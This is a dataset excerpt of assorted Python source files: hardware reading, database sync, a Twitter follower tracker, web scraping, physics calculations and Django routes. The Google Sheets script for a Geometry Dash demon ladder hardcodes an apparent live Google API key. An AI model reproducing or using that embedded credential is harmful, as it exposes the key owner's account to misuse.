main()\n","sub_path":"tools/build_all.py","file_name":"build_all.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"231481338","text":"import serial\nimport time\n\n# function to print out the weights\ndef GetBalanceWeight(port, bal_type):\n weight = 0.0\n count = 0\n # try until you can find a reasonable value\n while True:\n # distinguish the balance type\n if(bal_type == \"OB\"):\n port.write(\"IP\\r\\n\")\n read_data = port.readline()\n floa_data = read_data\n elif(bal_type == \"SB\"):\n port.write(\"\\x1BP\\r\\n\".encode())\n read_data = 
port.readline().decode('UTF-8')\n # convert read_data to float\n floa_data = \"\"\n for i in read_data:\n if((i==\"+\") or (i==\"-\") or (i==\".\") or (i>=\"0\" and i<=\"9\")):\n floa_data += i\n else:\n print(\"No such balance type\")\n read_data = \"0.0\"\n floa_data = \"0.0\"\n try:\n weight = float(floa_data)\n break\n except:\n print(\"Accepted string \", read_data, \"is formatted to \", floa_data)\n print(\"There is something wrong with the reading, try again in 0.2 second...\")\n count += 1\n time.sleep(0.2)\n if count > 2:\n weight = -1.0\n break\n return weight\n","sub_path":"python/rs232/balance_weight.py","file_name":"balance_weight.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"283112072","text":"\nimport time\n\ni = 10\nprint(\"Preparados para el despegue:\")\ntime.sleep(1)\nwhile i >= 0:\n print(i)\n i -= 1\n if i == 1:\n print(\"Arrancando propulsores\")\n time.sleep(1)\n if i == 0:\n print(\"Despegue\")\n\nelse:\n print(\"La cuenta a terminado\")","sub_path":"ejercicio3whileelse.py","file_name":"ejercicio3whileelse.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"49754614","text":"# Copyright 2019 Contributors to Hyperledger Sawtooth\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# -----------------------------------------------------------------------------\n\"\"\" Syncs the blockchain state to RethinkDB\n\"\"\"\nimport sys\nimport rethinkdb as r\nfrom rbac.common import addresser\nfrom rbac.common.util import bytes_from_hex\nfrom rbac.ledger_sync.deltas.decoding import TABLE_NAMES\nfrom rbac.common.logs import get_default_logger\n\nLOGGER = get_default_logger(__name__)\n\n\ndef get_updater(conn, block_num):\n \"\"\" Returns an updater function, which can be used to update the database\n appropriately for a particular address/data combo.\n \"\"\"\n return lambda adr, rsc: _update(conn, block_num, adr, rsc)\n\n\ndef _update_state(conn, block_num, address, resource):\n \"\"\" Update the state, state_history and metadata tables\n \"\"\"\n try:\n # update state table\n now = r.now()\n address_parts = addresser.parse(address)\n address_binary = bytes_from_hex(address)\n object_id = bytes_from_hex(address_parts.object_id)\n object_type = address_parts.object_type.value\n related_id = bytes_from_hex(address_parts.related_id)\n related_type = address_parts.related_type.value\n relationship_type = address_parts.relationship_type.value\n\n data = {\n \"address\": address_binary,\n \"object_type\": object_type,\n \"object_id\": object_id,\n \"related_type\": related_type,\n \"relationship_type\": relationship_type,\n \"related_id\": related_id,\n \"block_created\": int(block_num),\n \"block_num\": int(block_num),\n \"updated_date\": now,\n **resource,\n }\n delta = {\"block_num\": int(block_num), \"updated_at\": now, **resource}\n\n query = (\n r.table(\"state\")\n 
.get(address_binary)\n .replace(\n lambda doc: r.branch(\n # pylint: disable=singleton-comparison\n (doc == None), # noqa\n r.expr(data),\n doc.merge(delta),\n ),\n return_changes=True,\n )\n )\n\n result = query.run(conn)\n\n if result[\"errors\"] > 0:\n LOGGER.warning(\"error updating state table:\\n%s\\n%s\", result, query)\n if result[\"replaced\"] and \"changes\" in result and result[\"changes\"]:\n query = r.table(\"state_history\").insert(result[\"changes\"][0][\"old_val\"])\n result = query.run(conn)\n # data[\"address\"] = [address_binary, int(block_num)]\n if result[\"errors\"] > 0:\n LOGGER.warning(\n \"error updating state_history table:\\n%s\\n%s\", result, query\n )\n\n if not related_id:\n data[\"address\"] = address_binary\n del data[\"related_type\"]\n del data[\"relationship_type\"]\n del data[\"related_id\"]\n query = (\n r.table(\"metadata\")\n .get(address_binary)\n .replace(\n lambda doc: r.branch(\n # pylint: disable=singleton-comparison\n (doc == None), # noqa\n r.expr(data),\n doc.merge(delta),\n )\n )\n )\n result = query.run(conn)\n if result[\"errors\"] > 0:\n LOGGER.warning(\"error updating metadata record:\\n%s\\n%s\", result, query)\n\n except Exception as err: # pylint: disable=broad-except\n LOGGER.warning(\"update_state %s error:\", type(err))\n LOGGER.warning(err)\n\n\ndef _update_legacy(conn, block_num, address, resource, data_type):\n \"\"\" Update the legacy sync tables (expansion by object type name)\n \"\"\"\n try:\n data = {\n \"id\": address,\n \"start_block_num\": int(block_num),\n \"end_block_num\": int(sys.maxsize),\n **resource,\n }\n\n query = (\n r.table(TABLE_NAMES[data_type])\n .get(address)\n .replace(\n lambda doc: r.branch(\n # pylint: disable=singleton-comparison\n (doc == None), # noqa\n r.expr(data),\n doc.merge(resource),\n )\n )\n )\n result = query.run(conn)\n if result[\"errors\"] > 0:\n LOGGER.warning(\"error updating legacy state table:\\n%s\\n%s\", result, query)\n\n except Exception as err: # pylint: disable=broad-except\n LOGGER.warning(\"_update_legacy %s error:\", type(err))\n LOGGER.warning(err)\n\n\ndef _update(conn, block_num, address, resource):\n \"\"\" Handle the update of a given address + resource update\n \"\"\"\n data_type = addresser.get_address_type(address)\n pre_filter(resource)\n\n _update_state(conn, block_num, address, resource)\n\n if data_type in TABLE_NAMES:\n _update_legacy(conn, block_num, address, resource, data_type)\n\n\ndef pre_filter(resource):\n \"\"\" Filter or modifies values prior to writing them to the rethink sync tables\n 1. 
Changes dates from Int64 to a DateTime (Int64 would otherwise get translated to a string)\n    \"\"\"\n    keys = [key for key in resource]\n    for key in keys:\n        if key.endswith(\"_date\"):\n            try:\n                value = resource[key]\n                if value and int(value) != 0:\n                    resource[key] = r.epoch_time(int(value))\n                else:\n                    del resource[key]\n            except Exception:  # pylint: disable=broad-except\n                del resource[key]\n","sub_path":"rbac/ledger_sync/deltas/updating.py","file_name":"updating.py","file_ext":"py","file_size_in_byte":6176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"616599190","text":"# -*- coding: utf-8 -*-\nimport os, datetime, time, sys, json\nfrom pytz import timezone\nfrom django.core.management.base import BaseCommand\nfrom app.models import Account, Key\nfrom requests_oauthlib import OAuth1Session\n\n\nclass RateLimitError(Exception):\n    \"\"\" \"\"\"\n\n\nclass AccountNotFoundError(Exception):\n    \"\"\" \"\"\"\n\n\nclass Command(BaseCommand):\n\n    def handle(self, *args, **options):\n\n        self.twitter_session = None\n        self.api_limit_id = 15 \n        self.api_limit_user = 900\n        self.api_limit_dm = 1\n\n        # make session\n        CK, CS, AT, ATS = self.load_keys()\n        self.make_twitter_session(CK, CS, AT, ATS)\n\n        self.user_id = self.get_user_id()\n\n        # get current(old) user id list from db & new user id list from api\n        old_id_list = self.get_old_id_list()\n        new_id_list = self.get_follower_id_list()\n\n        # find removed user & new user\n        removed_id_list = list(set(old_id_list) - set(new_id_list))\n        new_id_list = list(set(new_id_list) - set(old_id_list))\n\n        self.handle_removed_accounts(removed_id_list)\n        self.handle_new_accounts(new_id_list)\n\n        self.update_user_profile_until_rate_limit()\n\n        return\n\n    def load_keys(self):\n        CK = str(Key.objects.get(key='consumer_key').value)\n        CS = str(Key.objects.get(key='consumer_secret').value)\n        AT = str(Key.objects.get(key='access_token').value)\n        ATS = str(Key.objects.get(key='access_token_secret').value)\n        return CK, CS, AT, ATS\n\n    def make_twitter_session(self, CK, CS, AT, ATS):\n        oauth_session = OAuth1Session(CK, CS, AT, ATS)\n        self.twitter_session = oauth_session\n    \n    def get_user_id(self):\n        endpoint = \"https://api.twitter.com/1.1/account/verify_credentials.json\"\n        res = self.twitter_session.get(endpoint)\n\n        if res.status_code == 200:\n            response = json.loads(res.text)\n            return response[\"id\"]\n        else:\n            raise ValueError(\"API failed: status code: \" + str(res.status_code))\n\n    def get_old_id_list(self):\n        following_accounts = Account.objects.filter(followed_you=True)\n        old_id_list = [ int(account.user_id) for account in following_accounts ]\n        return old_id_list\n\n    def get_follower_id_list(self):\n\n        if self.api_limit_id <= 0:\n            raise RateLimitError\n\n        endpoint = \"https://api.twitter.com/1.1/followers/ids.json\"\n        params = {}\n        res = self.twitter_session.get(endpoint, params=params)\n\n        # ToDo: support cursors once there are more than 5000 followers\n        if res.status_code == 200:\n            response_json = json.loads(res.text)\n            id_list = response_json[\"ids\"]\n            self.api_limit_id = int(res.headers[\"x-rate-limit-remaining\"])\n            return id_list\n        elif res.status_code == 429:\n            self.api_limit_id = 0\n            raise RateLimitError\n        else:\n            raise ValueError(\"API failed: status code: \" + str(res.status_code))\n\n    def get_user_profile(self, user_id):\n\n        if self.api_limit_user <= 0:\n            raise RateLimitError\n\n        endpoint = \"https://api.twitter.com/1.1/users/show.json\"\n        params = {\n            \"user_id\": user_id\n        }\n        res = self.twitter_session.get(endpoint, params=params)\n\n        if res.status_code == 200:\n            response = json.loads(res.text)\n            self.api_limit_user = int(res.headers[\"x-rate-limit-remaining\"])\n            return response\n        elif res.status_code == 429:\n            self.api_limit_user = 0\n            raise RateLimitError\n        elif res.status_code == 404:\n            raise AccountNotFoundError\n        else:\n            raise ValueError(\"API failed: status code: \" + str(res.status_code))\n\n    def handle_removed_accounts(self, removed_id_list):\n\n        for removed_user_id in removed_id_list:\n            removed_account = Account.objects.get(user_id=removed_user_id)\n            removed_account.followed_you = False\n            removed_account.unfollow_datetime = datetime.datetime.now(timezone('Asia/Tokyo'))\n            removed_account.save()\n\n            message = \"REMOVED: {} ({}) \\nhttps://twitter.com/{}\".format(\n                removed_account.name,\n                removed_account.screen_name,\n                removed_account.screen_name\n            )\n            try:\n                self.post_direct_message(message)\n            except RateLimitError:\n                continue\n\n    def handle_new_accounts(self, new_id_list):\n\n        for new_user_id in new_id_list:\n            new_account, is_created = Account.objects.get_or_create(user_id=new_user_id)\n            new_account.followed_you = True\n            new_account.follow_datetime = datetime.datetime.now(timezone('Asia/Tokyo'))\n            new_account.save()\n\n            try:\n                self.update_user_profile(new_account)\n                message = \"NEW FOLLOWER: {} ({}) https://twitter.com/{}\".format(\n                    new_account.name,\n                    new_account.screen_name,\n                    new_account.screen_name\n                )\n                self.post_direct_message(message)\n\n            except RateLimitError:\n                continue\n\n    def update_user_profile(self, account):\n\n        try:\n            profile = self.get_user_profile(account.user_id)\n            account.profile_updated_datetime = datetime.datetime.now(timezone('Asia/Tokyo'))\n            account.screen_name = profile.get(\"screen_name\", \"\")\n            account.name = profile.get(\"name\", \"\")\n            account.description = profile.get(\"description\", \"\")\n            account.followers_count = profile.get(\"followers_count\", 0)\n            account.friends_count = profile.get(\"friends_count\", 0)\n            account.location = profile.get(\"location\", \"\")\n            account.created_at = profile.get(\"created_at\", \"\")\n            account.save()\n\n        except AccountNotFoundError:\n            account.profile_updated_datetime = datetime.datetime.now(timezone('Asia/Tokyo'))\n            account.deleted = True\n            account.followed_you = False\n            account.save()\n\n    def update_user_profile_until_rate_limit(self):\n\n        accounts = Account.objects.filter(deleted=False).order_by(\"-profile_updated_datetime\")\n        for account in accounts:\n            try:\n                self.update_user_profile(account)\n            except RateLimitError:\n                break\n\n    def post_direct_message(self, message):\n\n        if self.api_limit_dm <= 0:\n            raise RateLimitError\n\n        endpoint = \"https://api.twitter.com/1.1/direct_messages/events/new.json\"\n        data = {\n            \"event\": {\n                \"type\": \"message_create\",\n                \"message_create\": {\n                    \"target\": {\n                        \"recipient_id\": self.user_id,\n                    },\n                    \"message_data\": {\n                        \"text\": message\n                    }\n                }\n            }\n        }\n        headers = {\n            \"content-type\": \"application/json\"\n        }\n        res = self.twitter_session.post(endpoint, json=data, headers=headers)\n\n        if res.status_code == 200:\n            # self.api_limit_dm = int(res.headers[\"x-rate-limit-remaining\"])\n            pass\n        elif res.status_code == 429:\n            self.api_limit_dm = 0\n            raise RateLimitError\n        else:\n            raise ValueError(\"API failed: status code: \" + str(res.status_code))\n","sub_path":"app/management/commands/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":7467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"393476645","text":"# Written for GD Demon 
Ladder\n# by RFMX (c) 2021\n\n# This script will return level data after you inputted the ID into levels.html\n# I wrote this on repl.it so I did not bother on line length lulz\n# Comments refer to the previous line except for headers, marked with *\n\n# Basic flow:\n# 1) make a HTTP request (Ajax call) to get data in column E of the list, which is a list of IDs of demons\n# 2) find where the desired ID is through the index() function and save that into a variable\n# 3) make a HTTP request again to get data in the row the demon is in\n# 4) extract data by utilising the arrangement of the data in the row and print it into the table\n\n# ** Setup **\n\n# * Import libraries *\nfrom browser import document, ajax, html\nimport json\n\n# * Changing variables *\nkey = 'AIzaSyC5EjLYGlY6W6zfkcQiQ6nK74zk_7yEjHk' # API key\ndefault_demon = '69274427' # Demon for no input, usually weekly\n\ndef on_complete(req):\t\n\t# ** extract for ID **\n\ttry: id_search = str(document.query['id']) # extract ID\n\texcept: id_search = default_demon # if ID parameter does not exist\n\n\t# * Load ID list *\n\tr_json = json.loads(req.text) # convert to json\n\tr_json = r_json['values'] # extract the values section\n\n\t# r_json is now an array of IDs with index that is OFF BY ONE compared to row number\n\n\t# ** search for the specific ID **\n\tid_array = []\n\tid_array.append(id_search)\n\ttry:\n\t\tdemon_no = r_json.index(id_array)\n\texcept: demon_no = -1\n\trow_no = demon_no + 1\n\n\t# ** URL setup **\n\trow_select = \"'The List'!\" + str(row_no) + \":\" + str(row_no)\n\tapiurl = \"https://sheets.googleapis.com/v4/spreadsheets/1xaMERl70vzr8q9MqElr4YethnV15EOe8oL1UV9LLljc/values/\" + row_select + \"?key=\" + key\n\n\t# ** Ajax call setup **\n\tif demon_no != -1:\n\t\tcall = ajax.ajax()\n\t\tcall.bind('complete', on_complete2)\n\t\tcall.open('GET', apiurl, True)\n\t\tcall.send()\n\telse:\n\t\tdocument['levelname'] <= 'There is no demon with the ID ' + str(document.query['id']) + '!'\n\n# ** the on_complete function **\n# the on_complete function executes after all the code is executed, which is a problem because I need to extract data from the Ajax call\n# ===OBSOLETE=== thankfully I only need to extract web data once from the json file and once from the web so I am throwing a lot of stuff into the on_complete function\n# I have migrated into having two Ajax call in a single script because this removes the need for me to constantly update the file\n\ndef on_complete2(req):\n\tr_json = json.loads(req.text) # converts to JSON\n\tr_json = r_json['values'] # extracts values\n\tr_json = r_json[0] # get into the array\n\t# sheets API always sort by ROWS as the major dimension\n\n\t# ** prints stuff on screen **\n\t# index is based on column oreder\n\tdocument['levelname'] <= r_json[0] + ' ('\n\tgdbrowser_url = 'https://gdbrowser.com/' + r_json[4]\n\tdocument['levelname'] <= html.A(r_json[4], href=gdbrowser_url, target=\"_blank\")\n\tdocument['levelname'] <= ')'\n\tdocument['levelcreator'] <= r_json[1]\n\tdocument['levelsong'] <= r_json[2]\n\tdocument['leveldiff'] <= r_json[3]\n\tif r_json[5] != \"unrated\":\n\t\tdocument['leveltier'] <= 'Tier ' + r_json[5] + ' (' + r_json[6] + ' corr to 2 d.p.)'\n\t\t# document['levelratings'] <= 'Submitted ratings:'\n\t\t# document['levelratings'] <= html.BR()\n\t\ti = 7\n\t\ttry:\n\t\t\twhile r_json[i] != '':\n\t\t\t\tlevelratings = ''\n\t\t\t\tlevelratings = ''.join([levelratings,'- Tier ',r_json[i]])\n\t\t\t\ti = i + 1\n\t\t\t\tlevelratings = ''.join([levelratings,' by 
',r_json[i]])\n\t\t\t\ti = i + 1\n\t\t\t\tdocument['levelratings'] <= levelratings\n\t\t\t\tdocument['levelratings'] <= html.BR()\n\t\texcept: pass\n\telse: document['leveltier'] <= 'Not rated with a tier (yet)'\n\n# ** Ajax call setup **\nfirstcallurl = \"https://sheets.googleapis.com/v4/spreadsheets/1xaMERl70vzr8q9MqElr4YethnV15EOe8oL1UV9LLljc/values/'The List'!E:E?key=\" + key\n\ncall = ajax.ajax()\ncall.bind('complete', on_complete)\ncall.open('GET', firstcallurl, True)\ncall.send()\n\n","sub_path":"scripts/leveldata.py","file_name":"leveldata.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78648717","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nClick on any random clickable element on a page.\nAlso demonstrates the use of postload_callbacks.\n\"\"\"\n\nfrom functools import partial\nfrom random import choice, random\n\nimport webtraversallibrary as wtl\nfrom webtraversallibrary.actions import Click, Refresh\n\nfrom .util import parse_cli_args\n\n\n@wtl.single_tab\ndef policy(workflow: wtl.Workflow, view: wtl.View) -> wtl.Action:\n assert workflow.duplicate_loop_idx == workflow.loop_idx\n\n # With some small probabilty, refresh instead of clicking.\n return choice(view.actions.by_type(Click)) if random() < 0.95 else view.actions.by_type(Refresh).unique()\n\n\ndef set_duplicate_loop_idx(workflow: wtl.Workflow):\n workflow.duplicate_loop_idx = workflow.loop_idx\n\n\nif __name__ == \"__main__\":\n cli_args = parse_cli_args()\n\n wf = wtl.Workflow(config=wtl.Config(cli_args.config), policy=policy, url=cli_args.url, output=cli_args.output)\n\n wf.classifiers.add(wtl.ActiveElementFilter(action=Click))\n\n wf.postload_callbacks.append(partial(set_duplicate_loop_idx, wf))\n\n wf.run()\n wf.quit()\n","sub_path":"examples/random_traversal.py","file_name":"random_traversal.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"51852037","text":"from matplotlib import pyplot as plot\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nfrom itertools import product\n\na = .246 # nanometers\nc = .671\n\na_1 = (3**.5/2, -.5, 0)\na_2 = (3**.5/2, .5, 0)\na_3 = (0, 0, c)\n\nbravais = np.array(list(a*np.dot(i, (a_1, a_2, a_3)) for i in product(range(5), repeat=3)))\n\nfig = plot.figure()\nax = fig.add_subplot(111, projection='3d')\nplot.axis('equal')\nax.scatter(bravais[:, 0], bravais[:, 1], bravais[:, 2])\nplot.show()","sub_path":"graphite.py","file_name":"graphite.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"609614586","text":"import scrapy\nfrom 
scrapy.utils.sitemap import Sitemap\nfrom scrapy.spiders.sitemap import SitemapSpider\nfrom items.UrlsItem import UrlsItem\n\n\nclass SiteMapSpider(SitemapSpider):\n name = 'sitemap'\n host = 'https://www.buildzoom.com'\n # sitemap_urls = ['https://www.buildzoom.com/sitemap.xml']\n\n def start_requests(self):\n yield scrapy.Request(url=f'{self.host}/sitemap.xml', callback=self.parse, meta={'proxy': 'http://192.168.11.82:9966'})\n\n def parse(self, response):\n response = Sitemap(response.body)\n count = 0\n for url in response:\n if url['loc'].find('contractors') + 1:\n count = count + 1\n yield scrapy.Request(url=url['loc'], callback=self.parse_contractors)\n if count == 1:\n break\n\n def parse_contractors(self, response):\n response = Sitemap(response.body)\n for url in response:\n if url['loc'] == self.host:\n continue\n yield UrlsItem(**{\n 'url': url['loc'],\n 'status': 0\n })\n\n\n# scrapy.utils.sitemap.Sitemap\n# scrapy.http.response.xml.XmlResponse\n# scrapy crawl sitemap --output=data.json -L WARNING\n","sub_path":"src/spiders/SitemapSpider.py","file_name":"SitemapSpider.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155310614","text":"\nimport numpy as np\nmu0 = 4* np.pi*1e-7 \nfrom ifigure.interactive import figure\nnp.set_printoptions(suppress=True)\n\nimport csv\n\nwith open('/home/jaman/T-1model-data/CurrentSegments.csv') as csv_file:\n \n csv_reader=csv.reader(csv_file, delimiter=',')\n init_terminal= [row[:6] for row in csv_reader]\n\n#print(len(init_terminal))\ninit_points=np.zeros((len(init_terminal),3))\nterm_points=np.zeros((len(init_terminal),3))\n\nidx=0\n\n\n\nfor line in init_terminal:\n for i in range(3):\n init_points[idx][i]=line[i]\n\n for i in range(3,6):\n term_points[idx][i-3]=line[i]\n idx+=1\nprint('all initial points')\nprint(init_points)\nprint('all terminal points')\nprint(term_points)\n\nall_mid_points=np.zeros((len(init_terminal),3))\nall_directions=np.zeros((len(init_terminal),3))\n\n\n\nfor i in range(len(init_terminal)):\n all_mid_points[i]=(init_points[i]+term_points[i])/2.0\n all_directions[i]=term_points[i]-init_points[i]\n\nprint('all mid points=')\nprint(all_mid_points)\nprint('all direction')\nprint(all_directions)\n\nwith open('/home/jaman/T-1model-data/Vertices.csv') as csv_file:\n \n csv_reader=csv.reader(csv_file, delimiter=',')\n lines= [row[:6] for row in csv_reader]\n\n \n \ninner_points=np.zeros((len(lines),3))\nouter_points=np.zeros((len(lines),3))\n\nidx=0\nfor points in lines:\n \n for i in range(3):\n\n if i==2:\n inner_points[idx][i]=0.0120\n else:\n inner_points[idx][i]=points[i]\n\n for i in range(3,6):\n if i==5:\n outer_points[idx][i-3]=0.0120\n else:\n outer_points[idx][i-3]=points[i]\n idx+=1\n\nprint(inner_points)\n#print(outer_points)\n\nmagnetic_field=np.zeros((len(inner_points),3))\nidx=0\n\n\n\nfor r in outer_points:\n local_magnetic_field=0\n cross_prod=np.zeros(3)\n \n for i in range(len(all_mid_points)):\n r_prime=r-all_mid_points[i]\n # print('r_prime=',r_prime)\n r_prime_length=np.sqrt(r_prime[0]**2+r_prime[1]**2+r_prime[2]**2)\n \n cross_prod[0]=all_directions[i][1]*r_prime[2]-all_directions[i][2]*r_prime[1]\n cross_prod[1]=all_directions[i][2]*r_prime[0]-all_directions[i][0]*r_prime[2]\n cross_prod[2]=all_directions[i][0]*r_prime[1]-all_directions[i][1]*r_prime[0]\n \n cross_prod=cross_prod/r_prime_length**3\n \n local_magnetic_field += cross_prod\n #print('cross product=',cross_prod)\n\n 
magnetic_field[idx]=1000*mu0*local_magnetic_field/4.0/np.pi\n #print(magnetic_field_inner[idx])\n idx+=1 \n #print('cen_index=',idx) \n#print('magnetic_field=',magnetic_field)\nnp.save('magnetic_field_outer_ted',magnetic_field)\n\n#v=figure()\n#v.plot(magnetic_field_inner[:,2])\n\n","sub_path":"ted_data_v1.py","file_name":"ted_data_v1.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"59625390","text":"from django.conf.urls import patterns, include, url\nfrom django.views.generic import TemplateView\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom tastypie.api import Api\n\nfrom gnonsite.api.v1 import resources as v1\nfrom gnonsite.api.v2 import resources as v2\nfrom gnonsite.api.v2_1 import resources as v2_1\nfrom main import views\nfrom django.views.generic import RedirectView\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\n\n\nadmin.autodiscover()\n\n\nv1_api = Api(api_name='v1')\nv1_api.register(v1.PostResource())\nv1_api.register(v1.PersonResource())\nv1_api.register(v1.OpinionResource())\nv1_api.register(v1.PlaceResource())\nv1_api.register(v1.CommentResource())\n\n\nv2_api = Api(api_name='v2')\nv2_api.register(v2.PostResource())\nv2_api.register(v2.PersonResource())\nv2_api.register(v2.OpinionResource())\nv2_api.register(v2.PlaceResource())\nv2_api.register(v2.CommentResource())\nv2_api.register(v2.CustomAPNSDeviceAuthenticatedResource())\nv2_api.register(v2.CustomGCMDeviceAuthenticatedResource())\nv2_api.register(v2.InvitationsResource())\nv2_api.register(v2.PollsResource())\nv2_api.register(v2.ChoiceResource())\nv2_api.register(v2.VoteResource())\n\n\n# v2_1_api = Api(api_name='v2.1')\n# v2_1_api.register(v2_1.PostResource())\n# v2_1_api.register(v2_1.PersonResource())\n# v2_1_api.register(v2_1.OpinionResource())\n# v2_1_api.register(v2_1.PlaceResource())\n# v2_1_api.register(v2_1.CommentResource())\n\nimport debug_toolbar\n\nurlpatterns = patterns('',\n # url(r'^__debug__/', include(debug_toolbar.urls)),\n # url(r'^landing/$', views.LandingTemplateView.as_view(), name='landing'),\n url(r'^webapp/$', views.IndexTemplateView.as_view(), name='index'),\n url(r'^$', RedirectView.as_view(url='http://anonygo.us')),\n url(r'^FAQ/$', TemplateView.as_view(template_name='main/faq.html'), name='faq'),\n url(r'^privacy_policy/$', TemplateView.as_view(template_name='main/policy.html'), name='privacy_policy'),\n url(r'^terms_of_services/$', TemplateView.as_view(template_name='main/terms.html'), name='terms_of_services'),\n url(r'^post/(?P\\d+)/$', views.PostDetailView.as_view(), name='post_details'),\n\n url(r'report/$', views.ReportTemplateView.as_view(), name='report'),\n url(r'report.csv/$', views.ReportCSVTemplateView.as_view(), name='report_csv'),\n\n url(r'^ajax/send_sms/$', 'main.ajax.send_sms_view', name='send_sms'),\n url(r'^ajax/create_comment/$', 'main.ajax.create_comment', name='create_comment'),\n\n url(r'^admin34/', include(admin.site.urls)),\n url(r'^metrics/', include('redis_metrics.urls')),\n url(r'^A856392EAA228CA076511FB5C4E66BEF.txt$', views.TextPlainView.as_view(template_name=\"A856392EAA228CA076511FB5C4E66BEF.txt\")),\n url(r'^robots.txt$', views.TextPlainView.as_view(template_name=\"robots.txt\")),\n url(r'^sitemap.xml$', views.SiteMapView.as_view(), name='sitemap'),\n (r'^api/', include(v2_api.urls)),\n # (r'^api/', include(v2_1_api.urls)),\n url(r'^unsubscribe/(?P\\d*)-(?P.*)/$', views.unsubscribe, 
name=\"unsubscribe_unsubscribe\"),\n    url(r'^download/$', views.download, name=\"download_download\"),\n) + staticfiles_urlpatterns()\n\nif settings.DEBUG:\n    import debug_toolbar\n    urlpatterns += patterns('',\n        url(r'^__debug__/', include(debug_toolbar.urls)),\n    )\n\nhandler500 = 'main.views.my_500_error'\nhandler400 = 'main.views.my_400_error'\n\n\n# urlpatterns += patterns('',\n#     url(r'^captcha/', include('captcha.urls')),\n# )\n","sub_path":"gnonsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"441422861","text":"class AlgorithmKey(object):\n\n    def __init__(self, BacteriaLevel: int, BacteriaID: int, AntibioticID: int):\n        self.BacteriaLevel = BacteriaLevel\n        self.BacteriaID = BacteriaID\n        self.AntibioticID = AntibioticID\n\n    def __eq__(self, other):\n        if isinstance(other, self.__class__):\n            return (self.BacteriaLevel == other.BacteriaLevel) and (self.BacteriaID == other.BacteriaID) and (\n                    self.AntibioticID == other.AntibioticID)\n        else:\n            return False\n\n    def __hash__(self):\n        \"\"\"Override hash function to match the hashes found in the C# side of the code. Not important\"\"\"\n        my_hash = 11\n        multiplicative_factor = 463\n\n        my_hash = (my_hash * multiplicative_factor) + hash(self.BacteriaLevel)\n        my_hash = (my_hash * multiplicative_factor) + hash(self.BacteriaID)\n        my_hash = (my_hash * multiplicative_factor) + hash(self.AntibioticID)\n\n        return my_hash\n","sub_path":"algorithm development/algorithm_run/algorithm_preferences/algorithm_key.py","file_name":"algorithm_key.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"361791342","text":"import random\nfrom string import digits\n\n\"\"\"\n1- All national codes are 10 digits.\n2- National codes whose digits are all the same are not valid.\nMethod: take the tenth digit of the national code (from the left) as A.\nTake a value B and set it equal to =\n(1st digit * 10) + (2nd digit * 9) + (3rd digit * 8) + (4th digit * 7) + (5th digit * 6) + (6th digit * 5) + (7th digit * 4) + (8th digit * 3) + (9th digit * 2).\nSet the value C equal to C = B - (B/11)*11.\nIf C equals zero and A equals C, the national code is valid.\nIf C equals 1 and A equals 1, the national code is valid.\nIf C is greater than 1 and A equals 11 - C, the national code is valid.\n\"\"\"\n\nclass NationalCode:\n    @staticmethod\n    def is_valid(code):\n        for i in code:\n            if i not in digits:\n                return False\n        if len(code) != 10 or code in [str(i)*10 for i in range(10)]:\n            return False\n        numArray = [int(ch) for ch in code]\n        a = numArray[9]\n        b = (numArray[0] * 10) + (numArray[1] * 9) + (numArray[2] * 8) + (numArray[3] * 7) + (numArray[4] * 6) + (numArray[5] * 5) + (numArray[6] * 4) + \\\n            (numArray[7] * 3) + (numArray[8] * 2)\n        c = b - (b//11) * 11\n        if (c == 0 and a == c) or (c == 1 and a == 1) or (c > 1 and a == abs(c - 11)):\n            return True\n        else:\n            return False\n    \n    @staticmethod\n    def random_m1():\n        while True:\n            random_code = ''\n            for _ in range(10):\n                random_code += random.choice(digits)\n            if NationalCode.is_valid(random_code):\n                return random_code\n    \n    @staticmethod\n    def random_between_m1(num1, num2):\n        while True:\n            code = random.randint(num1, num2)\n            if 